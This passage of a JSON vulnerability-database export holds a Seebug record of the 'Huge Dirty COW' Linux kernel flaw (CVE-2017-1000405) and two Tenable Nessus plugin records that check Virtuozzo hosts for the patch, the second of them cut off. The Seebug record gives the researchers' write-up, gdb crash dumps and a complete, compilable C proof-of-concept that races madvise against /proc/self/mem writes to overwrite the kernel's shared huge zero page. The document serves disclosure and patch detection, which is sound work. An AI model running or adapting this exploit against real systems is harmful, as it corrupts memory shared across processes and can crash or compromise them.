straightforward\u200a\u2014\u200awe can use a similar pattern of the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? () from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 <captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "modified": "2017-11-30T00:00:00", "published": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:34:24", "bulletinFamily": "scanner", "description": "According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n - A vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-14T00:00:00", "id": "VIRTUOZZO_VZA-2017-111.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105167", "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-111)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105167);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/01/14 10:10:15\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-111)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909951\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25634872\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:34:24", "bulletinFamily": "scanner", "description": "According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n - A vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-14T00:00:00", "id": "VIRTUOZZO_VZA-2017-110.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105166", "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-110)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105166);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/01/14 10:10:15\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-110)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909950\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6bc504c3\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 